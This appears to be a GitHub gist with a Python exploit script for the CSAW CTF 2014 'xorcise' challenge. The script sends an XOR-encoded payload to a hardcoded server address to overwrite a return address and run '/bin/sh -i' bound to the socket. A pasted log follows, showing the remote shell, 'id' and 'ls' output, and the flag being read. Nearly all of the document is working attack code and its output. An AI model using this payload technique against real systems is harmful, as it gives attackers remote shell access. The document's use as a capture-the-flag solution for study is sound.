CSAW CTF 2014 - xorcise exploit
#!/usr/bin/env python | |
import struct, sys, time | |
from nulllife import * | |
#CSAW 2014 CTF | |
#xorcise exploit | |
def xor(data, key): | |
o = '' | |
for i in range(len(data)): | |
o += chr(ord(data[i]) ^ ord(key[i%len(key)]) ^ 0x8F) | |
return o | |
key = "\x8F" + "\x8A" + "\x8F" * 3 + "\x9C" + "\x7B" + "\x99" #overwrite ret decipher x plt@system | |
cmd = "/bin/sh -i <&4 >&4 2>&4" | |
cmd += "\x00" * (128 - len(cmd)) | |
s = NullSocket("128.238.66.227", 24001) | |
s.write(chr(135) + key + xor(cmd, key)) | |
s.interactive() | |
''' | |
sh: cannot set terminal process group (134): Inappropriate ioctl for device | |
sh: no job control in this shell | |
sh-4.3$ id | |
id | |
uid=1000(xor) gid=1000(xor) groups=1000(xor) | |
sh-4.3$ ls -la | |
ls -la | |
total 44 | |
drwxr-xr-x 2 root root 4096 Sep 20 00:18 . | |
drwxr-xr-x 3 root root 4096 Sep 14 14:14 .. | |
-rw-r--r-- 1 root root 30 Sep 20 00:18 flag.txt | |
-rw-r--r-- 1 root root 7 Sep 12 19:13 password.txt | |
-rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise | |
-rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c | |
sh-4.3$ cat flag.txt | |
ceat flag.txt | |
flag{code_exec>=crypto_break} | |
sh-4.3$ exit | |
exit | |
exit | |
*** Connection closed by remote host *** | |
''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment